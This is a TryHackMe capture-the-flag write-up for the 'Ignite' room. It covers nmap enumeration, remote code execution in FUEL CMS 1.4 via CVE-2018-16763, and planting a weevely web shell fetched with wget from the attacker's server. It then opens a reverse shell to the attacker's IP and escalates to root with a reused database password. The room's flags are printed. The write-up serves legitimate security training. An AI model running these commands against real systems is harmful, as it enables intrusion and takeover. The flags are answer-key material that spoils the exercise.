---
layout: post
title: "Ignite - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - web
  - php
  - rce
  - eop
date: 2020/11/14 23:53:00
thumbnail: /images/TryHackMe/ignite.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Ignite
- **Profile:** [tryhackme.com](https://tryhackme.com/room/ignite)
- **Difficulty:** Easy
- **Description**: A new start-up has a few issues with their web server.

![Ignite](/images/TryHackMe/ignite.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap exploitdb pwncat weevely ruby-httpclient ruby-docopt
```

## Network enumeration

```
# Nmap 7.91 scan initiated Sat Nov 14 20:20:55 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.1.243
Nmap scan report for 10.10.1.243
Host is up (0.031s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 14 20:21:58 2020 -- 1 IP address (1 host up) scanned in 62.91 seconds
```

## Web exploitation

Browsing http://10.10.1.243/ we can see this is FUEL CMS 1.4.

```
$ searchsploit fuel cms 1.4
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)                                | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)                    | php/webapps/48778.txt
fuelCMS 1.4.1 - Remote Code Execution                                               | linux/webapps/47138.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47138
  Exploit: fuelCMS 1.4.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47138
     Path: /usr/share/exploitdb/exploits/linux/webapps/47138.py
File Type: HTML document, ASCII text, with CRLF line terminators
```

I created a Ruby [exploit](https://github.com/noraj/fuelcms-rce).

```
$ ruby CVE-2018-16763.rb http://10.10.1.243/ 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ruby CVE-2018-16763.rb http://10.10.1.243/ 'ls /bin/nc*'
/bin/nc
/bin/nc.openbsd
```

Let's create a web shell:

```
$ weevely generate noraj agent.php
```

Start a web server:

```
$ ruby -run -ehttpd . -p8080
```

Then download and execute it.

```
$ ruby CVE-2018-16763.rb http://10.10.1.243/ 'wget http://10.9.19.77:8080/agent.php'
```

Stop the web server and start a reverse shell listener:

```
$ pwncat -l 8080 -vv
```

Then launch a reverse shell from weevely webshell: 

```
$ weevely http://10.10.1.243/agent.php noraj
...
weevely> :backdoor_reversetcp 10.9.19.77 8080
```

Then upgrade our shell:

```
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ export TERM=xterm
```

Grab user flag:

```
www-data@ubuntu:/var/www/html$ cd /home/www-data

www-data@ubuntu:/home/www-data$ cat flag.txt
<edited>
```

Flag: {% spoiler 6470e394cbf6dab6a91682cc8585059b %}

## Elevation of Privilege

Let's try to find password in the application source code:

```
www-data@ubuntu:/var/www/html$ grep -r password fuel/application -n
grep -r password fuel/application -n
fuel/application/views/_install.php:121:                                                        <p>Install the FUEL CMS database by first creating the database in MySQL and then importing the <strong>fuel/install/fuel_schema.sql</strong> file. After creating the database, change the database configuration found in <strong>fuel/application/config/database.php</strong> to include your hostname (e.g. localhost), username, password and the database to match the new database you created.</p>
fuel/application/views/_install.php:187:                                                Password: <strong>admin</strong> (you can and should change this password and admin user information after logging in)</p>
fuel/application/config/database.php:20:|       ['password'] The password used to connect to the database
fuel/application/config/database.php:80:        'password' => 'mememe',
fuel/application/config/MY_fuel.php:32:// shows an alert in the admin backend if this is the admin password
```

`fuel/application/config/database.php` looks promising.

```
$ www-data@ubuntu:/var/www/html$ head -96 fuel/application/config/database.php | tail -21
$db['default'] = array(
        'dsn'   => '',
        'hostname' => 'localhost',
        'username' => 'root',
        'password' => 'mememe',
        'database' => 'fuel_schema',
        'dbdriver' => 'mysqli',
        'dbprefix' => '',
        'pconnect' => FALSE,
        'db_debug' => (ENVIRONMENT !== 'production'),
        'cache_on' => FALSE,
        'cachedir' => '',
        'char_set' => 'utf8',
        'dbcollat' => 'utf8_general_ci',
        'swap_pre' => '',
        'encrypt' => FALSE,
        'compress' => FALSE,
        'stricton' => FALSE,
        'failover' => array(),
        'save_queries' => TRUE
);
```

Then mysql and the system account share the same password:

```
www-data@ubuntu:/var/www/html$ su root
Password: mememe

root@ubuntu:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:/var/www/html# cd /root

root@ubuntu:~# ls
root.txt

root@ubuntu:~# cat root.txt
<edited>
```

Flag: {% spoiler b9bbcb33e11b80be759c4e844862482d %}
